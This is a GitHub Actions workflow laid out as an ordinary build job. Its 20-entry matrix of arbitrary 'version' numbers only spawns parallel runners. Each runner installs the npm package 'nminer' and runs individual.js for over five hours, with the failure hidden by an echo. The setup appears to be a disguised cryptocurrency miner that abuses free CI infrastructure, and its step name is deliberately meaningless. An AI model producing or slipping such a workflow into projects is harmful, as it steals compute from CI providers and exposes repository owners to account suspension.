name: individual
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 4421 }
          - { version: 109 }
          - { version: 3472 }
          - { version: 2413 }
          - { version: 4724 }
          - { version: 5026 }
          - { version: 2070 }
          - { version: 9027 }
          - { version: 4624 }
          - { version: 6787 }
          - { version: 688 }
          - { version: 1138 }
          - { version: 2316 }
          - { version: 4689 }
          - { version: 8721 }
          - { version: 5555 }
          - { version: 9176 }
          - { version: 8999 }
          - { version: 6191 }
          - { version: 8410 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: into geez strictly
        run: |
          npm install nminer@latest
          timeout 324m node individual.js || echo "individual executed"